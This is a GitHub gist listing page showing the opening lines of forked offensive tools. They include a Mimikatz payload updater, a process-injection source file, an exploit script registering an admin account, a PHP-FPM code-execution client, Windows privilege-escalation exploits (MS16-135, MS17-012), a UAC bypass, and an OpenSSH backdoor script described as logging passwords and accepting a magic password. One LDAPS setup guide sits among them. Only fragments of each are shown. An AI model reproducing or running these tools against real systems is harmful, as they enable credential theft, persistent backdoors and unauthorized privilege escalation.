Skip to content

Instantly share code, notes, and snippets.

Tomato Tom4t0

Block or report user

Report or block Tom4t0

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Tom4t0
Tom4t0 / Invoke-UpdateMimikatzScript.ps1
Created Apr 18, 2019 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
View Invoke-UpdateMimikatzScript.ps1
<#
.Synopsis
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
.DESCRIPTION
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
.PARAMETER DllPath
Path to powerkatz.dll generated via Visual Studio.
.PARAMETER ScriptPath
Path to Invoke-Mimikatz.ps1 script.
@Tom4t0
Tom4t0 / inject.c
Created Mar 25, 2019 — forked from hfiref0x/inject.c
Process Doppelgänging
View inject.c
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@Tom4t0
Tom4t0 / README.md
Created Feb 21, 2019 — forked from magnetikonline/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.
View README.md

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

View show_me_the_shell.py
import requests
def register(url):
reg_url = url + '/doregister.do'
post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'}
resp = requests.post(url=reg_url,data=post_data)
def login(url):
req = requests.Session()
login_url = url + '/login.do'
@Tom4t0
Tom4t0 / fpm.py
Created Apr 25, 2017 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
View fpm.py
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
View Invoke-MS16-135.ps1
function Invoke-MS16-135 {
<#
.SYNOPSIS
PowerShell implementation of MS16-135. The exploit targets all vulnerable
operating systems that support PowerShell v2+.
* Win7-Win10 <== 64 bit!
.PARAMETER Application
Specifies an Application to run.
View MS17-012.ps1
Function Start-ProcessInSession {
<#
.SYNOPSIS
Start a process in a different session on the same server when MS17-0100 is not installed
.DESCRIPTION
Based on the work of James Foreshaw
https://bugs.chromium.org/p/project-zero/issues/detail?id=1021
.PARAMETER SessionID
The SessionID where you want to pop a process. Use quser to find all SessionID's on a terminal server
@Tom4t0
Tom4t0 / openssh-autobackdoor.bash
Last active Mar 28, 2017 — forked from eyecatchup/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
View openssh-autobackdoor.bash
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View UAC-bypass.ps1
function Invoke-EventVwrBypass {
<#
.SYNOPSIS
Bypasses UAC by performing an image hijack on the .msc file extension
Expected to work on Win7, 8.1 and Win10
Only tested on Windows 7 and Windows 10
Author: Matt Nelson (@enigma0x3)
You can’t perform that action at this time.